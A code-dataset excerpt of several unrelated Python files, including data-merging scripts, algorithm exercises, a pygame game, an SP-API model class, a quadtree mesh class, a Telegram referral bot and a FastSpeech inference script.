[bz[-1]]\n\nassert len(edf['SYSTEM']) == len(bdf['SYSTEM']), \"Both dfs have different number of systems\"\n\nout = []\nfor i in range(len(edf['SYSTEM'])):\n\tsubdf = bdf.loc[(bdf['LP'] == edf['LP'][i]) & (bdf['SYSTEM'] == edf['SYSTEM'][i])]\n\ttemp = subdf.values.tolist()[0][:-1] + edf.loc[i].to_list()[2:]\n\t# print(temp)\n\tout.append(temp)\n\nndf = pd.DataFrame(out, columns=fin)\nndf.to_csv(\"scores_all.tsv\", sep=\"\\t\", index=False, header=True)\n\n#####################################################################\n\nbdf = pd.read_csv(br + 'BLEU_corr.tsv', sep='\\t')\nedf = pd.read_csv(br + 'corr_almost.tsv', sep='\\t')\n\nfdf = pd.DataFrame(columns=edf.columns.to_list())\nfor col in edf.columns.to_list():\n\tfin = pd.concat([bdf[col], edf[col]])\n\tfdf[col] = fin\n\nfdf.reset_index(drop=True, inplace=True)\nfdf.to_csv(\"corr_all.tsv\", sep=\"\\t\", index=False, header=True)\n\n#####################################################################\n","repo_name":"EshwarSR/AutomaticEvaluationMetrics","sub_path":"postproc/result_merge.py","file_name":"result_merge.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38527111136","text":"# 1859_백만장자프로젝트_서울2반_이민웅\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n cost_li = list(map(int, input().split()))\n cost_li2 = list(map(int, input().split()))[::-1]\n stack = []\n # profit = 0\n # idx_b = N-1\n # max_value = 0\n #\n # while idx_b >= 0:\n # if not stack:\n # stack.append(cost_li[idx_b])\n # max_value = cost_li[idx_b]\n # else:\n # if cost_li[idx_b] > max_value and cost_li[idx_b] > stack[-1]:\n # while stack:\n # profit += (max_value - stack.pop())\n # max_value = cost_li[idx_b]\n # stack.append(cost_li[idx_b])\n # else:\n # stack.append(cost_li[idx_b])\n # idx_b -= 1\n #\n # 
while stack:\n    #     profit += (max_value - stack.pop())\n    ''' front to back\n    i = ans = 0\n    while i < N:\n        i_mx = i\n        for j in range(i+1, N):\n            if cost_li[i_mx] '''\n    # => big time difference\n    ans = mx = 0\n    for value in cost_li2:\n        if mx > value:\n            ans += mx-value\n        else:\n            mx = value\n\n    print(f'#{tc} {ans}')\n","repo_name":"MinWoongL/Algorithm_Study","sub_path":"SWEA/Algorithm/230217/millionaire-project.py","file_name":"millionaire-project.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75038699253","text":"def solution(board, skill):\n    answer = 0\n    \n    rows = len(board)\n    cols = len(board[0])\n    \n    save = [[0] * (cols + 1) for _ in range(rows + 1)]\n    \n    for t, r1, c1, r2, c2, degree in skill:\n        if t == 1: # down\n            degree = -degree\n        \n        save[r1][c1] += degree\n        save[r1][c2+1] += -degree\n        save[r2+1][c1] += -degree\n        save[r2+1][c2+1] += degree\n        \n    for row in range(rows):\n        for col in range(1,cols):\n            save[row][col] += save[row][col-1]\n    \n    for col in range(cols):\n        for row in range(1,rows):\n            save[row][col] += save[row-1][col]\n    \n    for row in range(rows):\n        for col in range(cols):\n            if board[row][col] + save[row][col] > 0:\n                answer += 1\n    \n    return answer","repo_name":"Sh-IT0311/Coding-Test","sub_path":"programmers/level3/파괴되지 않은 건물.py","file_name":"파괴되지 않은 건물.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45842111614","text":"import pygame\r\nimport spritesheet\r\nimport itertools\r\nfrom pygame.locals import (\r\n    K_UP,\r\n    K_DOWN,\r\n    K_LEFT,\r\n    K_RIGHT,\r\n    K_ESCAPE,\r\n    KEYDOWN,\r\n    QUIT,\r\n)\r\n\r\n\r\nclass Game:\r\n    def __init__(self) -> None:\r\n        self.window_surface = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n        pygame.display.set_caption(\"Snowly Roller\")\r\n        self.x = 500.0\r\n        self.y = 500.0\r\n        self.fps = 60\r\n        self.clock = pygame.time.Clock()\r\n        self.init_time = pygame.time.get_ticks()\r\n        self.player = spritesheet.Player()\r\n        self.snowball = spritesheet.Snowball()\r\n        self.terrain = spritesheet.Terrain()\r\n        self.grass = pygame.image.load('images/Grass.png').convert_alpha()\r\n\r\n    def setup_background(self): \r\n        self.window_surface.blit(self.terrain.land_list[self.terrain.landframe], (162, 90)) \r\n        brick_width, brick_height = self.terrain.land_list[self.terrain.landframe].get_width(), self.terrain.land_list[self.terrain.landframe].get_height()\r\n        for x, y in itertools.product(range(0,1920+1,brick_width), range(0,1080+1,brick_height)): # locals here, so the player position in self.x/self.y is not clobbered\r\n            self.window_surface.blit(self.terrain.land_list[self.terrain.landframe], (x, y)) \r\n\r\n    def run(self):\r\n        running = True\r\n        while running:\r\n            # drawing stuff\r\n            self.window_surface.blit(self.grass, (0, 0))\r\n            self.setup_background()\r\n            self.window_surface.blit(self.player.animation_list[self.player.action][self.player.frame], (self.x, self.y))\r\n            self.window_surface.blit(self.snowball.snow_list[self.snowball.frame], (self.x + self.snowball.x, self.y + self.snowball.y))\r\n            # handling events\r\n            for event in pygame.event.get():\r\n                if event.type == pygame.QUIT:\r\n                    running = False\r\n                elif event.type == pygame.KEYUP:\r\n                    if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT or event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n                        self.player.is_moving = False\r\n                        self.player.frame = 0\r\n                elif event.type == KEYDOWN:\r\n                    if event.key == K_ESCAPE:\r\n                        running = False\r\n                    if event.key == K_UP:\r\n                        self.player.action = 1\r\n                        self.player.frame = 0\r\n                        self.snowball.x = 17\r\n                        self.snowball.y = -12\r\n                    if event.key == 
K_LEFT:\r\n                        self.player.action = 2\r\n                        self.player.frame = 0\r\n                        self.snowball.x = -22\r\n                        self.snowball.y = 23\r\n                    if event.key == K_DOWN:\r\n                        self.player.action = 3\r\n                        self.player.frame = 0\r\n                        self.snowball.x = 22\r\n                        self.snowball.y = 62\r\n                    if event.key == K_RIGHT:\r\n                        self.player.action = 0\r\n                        self.player.frame = 0\r\n                        self.snowball.x = 65\r\n                        self.snowball.y = 24 \r\n                elif event.type == QUIT:\r\n                    running = False \r\n\r\n            key_pressed_is = pygame.key.get_pressed() \r\n            if key_pressed_is[K_LEFT] and self.x > 200:\r\n                self.x -= 10\r\n                self.player.is_moving = True\r\n            if key_pressed_is[K_RIGHT] and self.x < 1640:\r\n                self.x += 10\r\n                self.player.is_moving = True\r\n            if key_pressed_is[K_UP] and self.y > 100:\r\n                self.y -= 10\r\n                self.player.is_moving = True\r\n            if key_pressed_is[K_DOWN] and self.y < 880:\r\n                self.y += 10\r\n                self.player.is_moving = True \r\n\r\n            current_time = pygame.time.get_ticks()\r\n            if current_time - self.init_time >= self.player.animation_cooldown:\r\n                if self.player.is_moving:\r\n                    self.player.frame += 1\r\n                    self.snowball.frame += 1\r\n                    self.init_time = current_time\r\n                if self.player.frame >= len(self.player.animation_list[self.player.action]):\r\n                    self.player.frame = 0\r\n                if self.snowball.frame >= len(self.snowball.snow_list):\r\n                    self.snowball.frame = 0 \r\n\r\n            self.clock.tick(self.fps)\r\n            pygame.display.update() \r\n        pygame.quit() \r\n\r\n\r\n    def update(self):\r\n        # This function should be called for every loop through the main game loop.\r\n        # It should tell every object to update itself.\r\n        # You may end up needing to pass variables to the objects for them to update properly. For instance, player inputs.\r\n        pass\r\n\r\n    def draw(self):\r\n        # This function should be called every loop through the main game loop.\r\n        # This should tell every object to draw itself.\r\n        # You may have to pass the surface you want objects to draw themselves on to.\r\n        pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    SCREEN_WIDTH, SCREEN_HEIGHT = 1920, 1080\r\n    pygame.init()\r\n    Game().run()","repo_name":"SnoozingPinata/reddit-help","sub_path":"thexerox123/SnowlyRoller.py","file_name":"SnowlyRoller.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33899130143","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n    from ..models.fees_estimate import FeesEstimate\n    from ..models.fees_estimate_error import FeesEstimateError\n    from ..models.fees_estimate_identifier import FeesEstimateIdentifier\n\n\nT = TypeVar(\"T\", bound=\"FeesEstimateResult\")\n\n\n@attr.s(auto_attribs=True)\nclass FeesEstimateResult:\n    r\"\"\"An item identifier and the estimated fees for the item.\n\n    Attributes:\n        status (Union[Unset, str]): The status of the fee request. 
Possible values: Success, ClientError, ServiceError.\n fees_estimate_identifier (Union[Unset, FeesEstimateIdentifier]): An item identifier, marketplace, time of\n request, and other details that identify an estimate.\n fees_estimate (Union[Unset, FeesEstimate]): The total estimated fees for an item and a list of details.\n error (Union[Unset, FeesEstimateError]): An unexpected error occurred during this operation.\n \"\"\"\n\n status: Union[Unset, str] = UNSET\n fees_estimate_identifier: Union[Unset, \"FeesEstimateIdentifier\"] = UNSET\n fees_estimate: Union[Unset, \"FeesEstimate\"] = UNSET\n error: Union[Unset, \"FeesEstimateError\"] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n status = self.status\n fees_estimate_identifier: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.fees_estimate_identifier, Unset):\n fees_estimate_identifier = self.fees_estimate_identifier.to_dict()\n\n fees_estimate: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.fees_estimate, Unset):\n fees_estimate = self.fees_estimate.to_dict()\n\n error: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.error, Unset):\n error = self.error.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if status is not UNSET:\n field_dict[\"Status\"] = status\n if fees_estimate_identifier is not UNSET:\n field_dict[\"FeesEstimateIdentifier\"] = fees_estimate_identifier\n if fees_estimate is not UNSET:\n field_dict[\"FeesEstimate\"] = fees_estimate\n if error is not UNSET:\n field_dict[\"Error\"] = error\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.fees_estimate import FeesEstimate\n from ..models.fees_estimate_error import FeesEstimateError\n from ..models.fees_estimate_identifier import FeesEstimateIdentifier\n\n d = src_dict.copy()\n status = d.pop(\"Status\", UNSET)\n\n _fees_estimate_identifier = d.pop(\"FeesEstimateIdentifier\", UNSET)\n fees_estimate_identifier: Union[Unset, FeesEstimateIdentifier]\n if isinstance(_fees_estimate_identifier, Unset):\n fees_estimate_identifier = UNSET\n else:\n fees_estimate_identifier = FeesEstimateIdentifier.from_dict(_fees_estimate_identifier)\n\n _fees_estimate = d.pop(\"FeesEstimate\", UNSET)\n fees_estimate: Union[Unset, FeesEstimate]\n if isinstance(_fees_estimate, Unset):\n fees_estimate = UNSET\n else:\n fees_estimate = FeesEstimate.from_dict(_fees_estimate)\n\n _error = d.pop(\"Error\", UNSET)\n error: Union[Unset, FeesEstimateError]\n if isinstance(_error, Unset):\n error = UNSET\n else:\n error = FeesEstimateError.from_dict(_error)\n\n result = cls(\n status=status,\n fees_estimate_identifier=fees_estimate_identifier,\n fees_estimate=fees_estimate,\n error=error,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in 
self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/product_fees_v0/models/fees_estimate_result.py","file_name":"fees_estimate_result.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2443628760","text":"import re\na = list(map(int, re.findall(r\"\\S+\", input())))\nb = list(map(int, re.findall(r\"\\S+\", input())))\nsumm=[0]*1\nsumm[0]=b[0]\nfor i in range(len(b)-1):\n summ.append(summ[i]+b[i+1])\nbruh=0\na0=0\na1=a[1]\nbz=summ[a[1]]\nif bz==a[2]:\n print(1)\nelse:\n for i in range(a[1]+1, len(summ)):\n if summ[i]- summ[i-a[1]-1]==a[2]:\n bz=i\n bruh=1\n break\n if bruh == 0:\n print(0)\n else:\n print(i-a[1]+1)\n\n","repo_name":"aminealist/Olympiad-programming","sub_path":"Informatics/1583.py","file_name":"1583.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13162111306","text":"# This is the solution to run for the PyPoll assignment\nimport os\nimport csv\nimport operator\n\n# Lists to store data\nvoters = []\ncounty = []\ncandidate = []\nkhan_vote_count = []\nli_vote_count = []\ncorrey_vote_count = []\notooley_vote_count = []\n\n# Set path for file\ncsv_poll_data = os.path.join(\"..\", \"Resources\", \"election_data.csv\")\n\n# Open the CSV\nwith open(csv_poll_data) as voting_data:\n csv_reader = csv.reader(voting_data, delimiter=\",\")\n\n # Reads & prints header row in CSV file\n csv_header = next(csv_reader)\n #print(f\"CSV Header: {csv_header}\")\n\n # Create lists for data in file\n for row in csv_reader:\n \n voters.append(row[0])\n\n county.append(row[1])\n\n candidate.append(row[2])\n\n# Find the total number of votes.\ntotal_votes = len(voters)\n\n\n# Create a list of unique counties.\ncounty_list = set(county)\n\n\n# Create a list of unique candidates.\ncandidate_list = set(candidate)\n\n\n# Create a dictionary for all lists\ncandidate_data = dict(zip(voters,candidate))\n\n\n# Count the total number of votes for each candidate\nfor x in candidate_data:\n if(candidate_data[x] == \"Khan\"):\n khan_vote_count.append(candidate_data[x])\n elif(candidate_data[x] == \"Correy\"):\n correy_vote_count.append(candidate_data[x])\n elif(candidate_data[x] == \"Li\"):\n li_vote_count.append(candidate_data[x])\n else:\n otooley_vote_count.append(candidate_data[x])\n \n\n# Determines the percentage of the total vote each candidate received.\nvotes_for_khan = len(khan_vote_count)\nvotes_for_correy = len(correy_vote_count)\nvotes_for_li = len(li_vote_count)\nvotes_for_otooley = len(otooley_vote_count)\n\nkhan_vote_pct = \"{:.3%}\".format(votes_for_khan / total_votes)\ncorrey_vote_pct = \"{:.3%}\".format(votes_for_correy / total_votes)\nli_vote_pct = \"{:.3%}\".format(votes_for_li / total_votes)\notooley_vote_pct = \"{:.3%}\".format(votes_for_otooley / total_votes)\n\n\n# Create a dictionary that lists the candidate and their total vote counts.\nvote_summary = {\"Khan\": [votes_for_khan], \"Correy\": [votes_for_correy], \"Li\": [votes_for_li], \"O'Tooley\": [votes_for_otooley]}\n\n# Determines the winner of the election by finding the candidate with the greatest number of votes.\nwinner = max(vote_summary,key = vote_summary.get)\n\n\n# Prints the output in the terminal\nprint(\"\")\nprint(\"Election Results\")\nprint(\"----------------------------\")\nprint(f\"Total Votes: {total_votes}\")\nprint(\"----------------------------\")\nprint(f\"Khan: {khan_vote_pct}: 
({votes_for_khan})\")\nprint(f\"Correy: {correy_vote_pct}: ({votes_for_correy})\")\nprint(f\"Li: {li_vote_pct}: ({votes_for_li})\")\nprint(f\"O'Tooley: {otooley_vote_pct}: ({votes_for_otooley})\")\nprint(\"----------------------------\")\nprint(f\"Winner: {winner}\")\nprint(\"----------------------------\")\n\n\n# File path to write to\noutput_path = os.path.join(\"..\", \"Analysis\", \"pypoll_results.csv\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, \"w\") as csvfile:\n\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n csvwriter.writerow([\"Election Results\"])\n csvwriter.writerow([\"Total Votes\", \"Votes For Khan\", \"Khan Vote Pct\", \"Votes For Correy\", \"Correy Vote Pct\", \"Votes For Li\", \"Li Vote Pct\", \"Votes For O'Tooley\", \"O'Tooley Vote Pct\", \"Winner\"])\n csvwriter.writerow([total_votes, votes_for_khan, khan_vote_pct, votes_for_correy, correy_vote_pct, votes_for_li, li_vote_pct, votes_for_otooley, otooley_vote_pct, winner])\n","repo_name":"Efritch/python-challenge","sub_path":"PyPoll/pypoll_main.py","file_name":"pypoll_main.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16108546315","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nEach cut element is an instance of the class QuadTree\n\"\"\"\n#%%\n\nfrom shapely.geometry import box\nfrom matplotlib import pyplot as plt\n\n#%%\n\nLeaves=[]\ntemp=[]\nLabel = []\n\nclass QuadTree():\n \n \"\"\"\n Convention is:\n myChildren[0] = SW myChildren[1] = SE\n myChildren[2] = NE myChildren[3] = NW\n \n \"\"\"\n #Nodes and Leaves Counter\n myNoOfNodes = 0\n myNoOfLeaves = 0\n Integ_Input= []\n \n \n def __init__(self,CutCellNum,Phy_domain, xmin, ymin, xmax, ymax, father, level, stringCode,ID):\n self.ElementNum=CutCellNum\n self.Domain=Phy_domain\n self.myXmin = xmin\n self.myYmin = ymin\n self.myXmax = xmax\n self.myYmax = ymax\n self.myfather = father\n self.myLevel = level\n self.myStringCode = stringCode\n self.myChildren = None\n self.myCell = box(xmin, ymin, xmax, ymax)\n self.ID = ID\n self.label = []\n QuadTree.myNoOfNodes+=1\n \t \n \n def divideMe(self):\n \"\"\"\n This function creates 4 new objects of type Quadtree\n \n Input : The current object\n Output : None\n \n \"\"\" \n self.middleX = 0.5 * (self.myXmax + self.myXmin)\n self.middleY = 0.5 * (self.myYmax + self.myYmin)\n self.myChildren = [QuadTree(self.ElementNum, self.Domain,self.myXmin, self.myYmin, self.middleX, self.middleY, self, self.myLevel + 1, \"0\",1),\n QuadTree(self.ElementNum, self.Domain,self.middleX, self.myYmin, self.myXmax, self.middleY, self, self.myLevel + 1, \"0\",2),\n QuadTree(self.ElementNum, self.Domain,self.middleX, self.middleY, self.myXmax, self.myYmax, self, self.myLevel + 1, \"0\",3),\n QuadTree(self.ElementNum, self.Domain,self.myXmin, self.middleY, self.middleX, self.myYmax, self, self.myLevel + 1, \"0\",4)] \n for i in range (0,4):\n self.myChildren[i].Integration_Input() \n \n \n def amIcut(self):\n \"\"\"\n This function checks whether the current object (cut element's leaf) is cut\n The object's string code is updated as follows\n # 0 = totally outside\n # 1 = totally inside\n # 2 = cut \n \n Input : The current object\n Output : A Boolen (0 or 1)\n \n \"\"\"\n \n if self.Domain.contains(self.myCell):\n self.myStringCode = '1'\n return False\n \n elif self.myCell.intersects(self.Domain):\n self.myStringCode = '2'\n return True\n \n else:\n self.myStringCode = 
'0'\n return False\n\n \n def generateQuadtree(self, maxLevel):\n \"\"\"\n This functions generates quadtree for the cut element recursively till the specified depth\n \n Input : Current Object & The depth to which Quad-tree is to be performed\n Output : None\n \n \"\"\" \n if (self.myLevel < maxLevel and self.amIcut()):\n self.divideMe()\n for children in self.myChildren:\n children.generateQuadtree(maxLevel)\n \n \n def Get_myNoOfLeaves(self):\n \"\"\"\n This function returns number of leaves for a cut element\n \n Input : The cut element object\n Output : Number of leaves for the cut element\n \n \"\"\" \n if (self.myChildren!= None):\n for children in self.myChildren:\n children.Return_Leaves_list()\n else:\n QuadTree.myNoOfLeaves+=1\n \n return QuadTree.myNoOfLeaves\n \n \n def Return_Leaves_list(self):\n \"\"\"\n This function returns the minimum and maximum bounds for each leaf of a cut element\n \n Input : The cut element object\n Output : A list containing minimum and maximum bounds for each leaf of a cut element\n \n \"\"\" \n if(self.myfather==None):\n del Leaves[:]\n \n if (self.myChildren!= None):\n for children in self.myChildren:\n children.Return_Leaves_list()\n else:\n QuadTree.myNoOfLeaves+=1\n temp=[(self.myXmin,self.myYmin),(self.myXmax,self.myYmax)]\n if temp not in Leaves:\n Leaves.append(temp)\n \n return Leaves\n \n \n def Integration_Input(self):\n \n \"\"\"\n This function creates the label of each node.\n for e.g, if a node has the following label [4,2,1]. This means:\n 4 -> parent node in level 1\n 2 -> parent node in level 2\n 1 -> node ID in level 2\n \n Input: The current object\n Output: None\n \"\"\"\n if self.myfather != None:\n for i in range (0,len(self.myfather.label)):\n self.label.append(self.myfather.label[i])\n self.label.append(self.ID)\n\n \n def Return_Label_list(self, Label):\n \"\"\"\n This function returns the label for each leaf of a cut element\n for e.g, if a leaf has the following label [4,2,1]. 
This means:\n 4 -> parent node in level 1\n 2 -> parent node in level 2\n 1 -> leaf node in level 2\n \n Input : The cut element object\n Output : None\n \n \"\"\" \n if(self.myfather==None):\n del Label[:]\n \n if (self.myChildren != None):\n for children in self.myChildren:\n children.Return_Label_list(Label)\n if children.myStringCode !='2':\n temp = children.label\n Label.append(temp)\n \n \n def plotTreeToConsole(self):\n \"\"\"\n This function plots the Quad tree of a cut element to console\n \n Input : The cut element object\n Output : None\n \n \"\"\" \n x,y = self.myCell.exterior.xy\n plt.plot(x,y, color='blue',linewidth = 1.0)\n if (self.myChildren != None):\n for children in self.myChildren:\n children.plotTreeToConsole()\n \n \n","repo_name":"Msalmanyousaf/FCM_in_Abaqus","sub_path":"Python Scripts/My_CutCell_QuadTree.py","file_name":"My_CutCell_QuadTree.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36136204168","text":"import os\nimport time\nfrom typing import List\n\nfrom flask import Flask, request\n\nimport telebot\n\nfrom app import markups, mongo\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nTOKEN = os.environ[\"TOKEN\"]\nPHOTO_ID = os.environ[\"PHOTO_ID\"]\nCHANNEL = os.environ[\"CHANNEL\"]\nADMIN = os.environ[\"ADMIN\"]\n\nbot = telebot.TeleBot(TOKEN)\nserver = Flask(__name__)\n\ndef send_messages(ids: List[str], func, **kwargs):\n count = 0\n for id in ids:\n try:\n func(id, **kwargs)\n count += 1\n except:\n continue\n if count % 20 == 0:\n time.sleep(.7)\n\n\n@bot.message_handler(commands=[\"start\"], chat_types=[\"private\"])\ndef start(message):\n \"\"\"\n Handle start messages\n \"\"\"\n user = message.from_user\n if user.id == int(ADMIN):\n message = '''Hi Admin, any message you send to the bot would be broadcast to all users\n\nExample\n```\n/sendphoto\nI am the tedx Bot\n```\n\nThis would send a photo with the caption \"I am the tedx Bot\" to all bot users\n\nAny message sent to the bot that is not a /start message would be broadcast to all users\n'''\n bot.send_message(user.id, text=message, parse_mode='MarkdownV2')\n return\n\n # Add new user to the broadcasting database\n mongo.insert_new_user(\n id=user.id,\n username=user.username,\n first_name=user.first_name,\n last_name=user.last_name,\n )\n\n message_text_list = message.text.split(\" \")\n users_firstname = user.first_name.split(\" \")[0]\n\n # Updates referral if the start message is more than length of 1 string\n if len(message_text_list) > 1:\n mongo.update_referral(message_text_list[-1], user.id)\n\n # Reply /start message\n bot.send_photo(\n message.chat.id,\n caption=f\"Hi {users_firstname.title()}, My name is Alex 👨‍✈️, the TEDxbot, and I am here to make your experience memorable.\",\n photo=PHOTO_ID,\n reply_markup=markups.get_start_markup(),\n )\n\n\n@bot.callback_query_handler(func=lambda call: call.data == \"start\")\ndef start_query_handler(call):\n \"\"\"\n Handle the \"start\" Callback query\n \"\"\"\n # Initialise variables\n user_id = call.from_user.id\n chat_id = call.message.chat.id\n\n # Check if user is a member of TEDx Channel, if not, end function execution\n if bot.get_chat_member(CHANNEL, user_id=user_id).status == \"left\":\n bot.send_message(\n chat_id,\n text=\"You're not a member of the channel⁉\\n\\\nYou need to join the [TEDxCovenantUniversity Channel](https://t.me/tedxcovenantuniversity)\",\n parse_mode=\"MarkdownV2\",\n )\n\n bot.send_message(\n chat_id,\n text=\"I have joined the channel\",\n reply_markup=markups.get_start_markup(),\n )\n return\n\n else:\n bot.send_message(\n chat_id,\n text=\"✅Thank you for joining the \\\nTEDxCovenantUniversity Community\",\n parse_mode=\"MarkdownV2\",\n reply_markup=markups.get_next_markup(),\n )\n\n\n@bot.callback_query_handler(func=lambda call: call.data == \"link\")\ndef get_referral_link(call):\n # Creates a referral link for the user and adds them as a participant\n\n user = call.from_user\n chat = call.message.chat\n link_caption = (\n \"You can share this link with your friends and win some amazing prizes🤑\\n\"\n )\n\n # Checks if user has a telegram username\n if not user.username:\n bot.send_message(\n chat.id,\n text=f\"{link_caption}\\nhttps://t.me/tedxcu_bot/?start=_0_{user.id}_\",\n )\n else:\n bot.send_message(\n chat.id,\n text=f\"{link_caption}\\nhttps://t.me/tedxcu_bot/?start=_{user.username}_0_{user.id}_\",\n )\n\n mongo.insert_new_participant(\n id=user.id,\n username=user.username,\n first_name=user.first_name,\n last_name=user.last_name,\n )\n\n\n@bot.message_handler(func=lambda message: message.text.startswith(\"/sendphoto\"))\ndef broadcast_image(message):\n \"\"\"\n Handles messages meant for image captions\n \"\"\"\n # Check if User is admin\n if message.from_user.id != int(ADMIN):\n return\n\n # Remove \"/sendphoto\" from message.text\n caption = \"\\n\".join(message.text.split(\"\\n\")[1:])\n\n # Broadcast image with message.text as caption\n image_id = mongo.get_image_id()\n\n user_ids = mongo.get_ids()\n send_messages(user_ids, func=bot.send_photo, photo=image_id, caption=caption)\n\n\n@bot.message_handler(func=lambda message: message.from_user.id == int(ADMIN))\ndef broadcast_message(message):\n \"\"\"\n Broadcasts messages from admin to all bot users\n \"\"\"\n user_ids = mongo.get_ids()\n send_messages(user_ids, func=bot.send_message, text=message.text)\n\n\n@bot.message_handler(content_types=[\"photo\"])\ndef save_image(message):\n \"\"\"\n Gets the image ID from the message and uploads it to Mongo\n \"\"\"\n if message.from_user.id != int(ADMIN):\n return\n image_id = message.photo[0].file_id\n mongo.change_image_id(image_id)\n\n\n@server.route(\"/\" + TOKEN, methods=[\"POST\"])\ndef getMessage():\n json_string = request.get_data().decode(\"utf-8\")\n update = telebot.types.Update.de_json(json_string)\n bot.process_new_updates([update])\n return \"!\", 200\n\n\n@server.route(\"/\")\ndef webhook():\n bot.remove_webhook()\n bot.set_webhook(url=\"https://tedx-cu-bot.herokuapp.com/\" + TOKEN)\n return \"!\", 200\n\n\nif __name__ == \"__main__\":\n server.run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\n","repo_name":"HackerManPeter/tedx-covenant-university-telegram-bot","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27605043927","text":"import torch\nimport torch.nn as nn\nimport argparse\nimport numpy as np\nimport random\nimport time\nimport shutil\nimport os\nimport matplotlib.pyplot as plt\n\nimport hparams as hp\nimport audio\nimport utils\nimport dataset\nimport text\nimport model as M\nimport waveglow\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef get_DNN(num):\n checkpoint_path = \"checkpoint_\" + str(num) + \".pth.tar\"\n model = nn.DataParallel(M.FastSpeech()).to(device)\n model.load_state_dict(torch.load(os.path.join(hp.checkpoint_path,\n 
checkpoint_path))['model'])\n model.eval()\n return model\n\n\ndef synthesis(model, phn, alpha=1.0):\n text = np.array(phn)\n text = np.stack([text])\n src_pos = np.array([i+1 for i in range(text.shape[1])])\n src_pos = np.stack([src_pos])\n sequence = torch.from_numpy(text).cuda().long()\n src_pos = torch.from_numpy(src_pos).cuda().long()\n\n with torch.no_grad():\n _, mel = model.module.forward(sequence, src_pos, alpha=alpha)\n return mel[0].cpu().transpose(0, 1), mel.contiguous().transpose(1, 2)\n\n\ndef get_data():\n test1 = \"Accept the things to which fate binds you, and love the people with whom fate brings you together, but do so with all your heart\"\n test2 = \"We suffer more often in imagination than in reality\"\n test3 = \"Wasserstein distance or Kantorovich Rubinstein metric is a distance function defined between probability distributions on a given metric space\"\n\n data_list = list()\n data_list.append(text.text_to_sequence(test1, hp.text_cleaners))\n data_list.append(text.text_to_sequence(test2, hp.text_cleaners))\n data_list.append(text.text_to_sequence(test3, hp.text_cleaners))\n\n return data_list\n\n\nif __name__ == \"__main__\":\n # Test\n wave_glow = torch.hub.load('NVIDIA/DeepLearningExamples:torchhub', 'nvidia_waveglow', model_math='fp32')\n wave_glow = wave_glow.remove_weightnorm(wave_glow)\n wave_glow.cuda().eval()\n WaveGlow = wave_glow\n parser = argparse.ArgumentParser()\n parser.add_argument('--step', type=int, default=18000)\n parser.add_argument(\"--alpha\", type=float, default=1.0)\n args = parser.parse_args()\n\n print(\"use griffin-lim and waveglow\")\n model = get_DNN(args.step)\n data_list = get_data()\n for i, phn in enumerate(data_list):\n mel, mel_cuda = synthesis(model, phn, args.alpha)\n if not os.path.exists(\"results\"):\n os.mkdir(\"results\")\n plt.figure(figsize=(20,5))\n plt.imshow(mel_cuda.detach().cpu()[0], aspect='auto', origin='lower')\n plt.savefig(\"results/\"+str(args.step)+\"_\"+str(i)+\".png\")\n audio.tools.inv_mel_spec(\n mel, \"results/\"+str(args.step)+\"_\"+str(i)+\".wav\")\n waveglow.inference.inference(\n mel_cuda, WaveGlow,\n \"results/\"+str(args.step)+\"_\"+str(i)+\"_waveglow.wav\")\n print(\"Done\", i + 1)\n\n s_t = time.perf_counter()\n for i in range(100):\n for _, phn in enumerate(data_list):\n _, _, = synthesis(model, phn, args.alpha)\n print(i)\n e_t = time.perf_counter()\n print((e_t - s_t) / 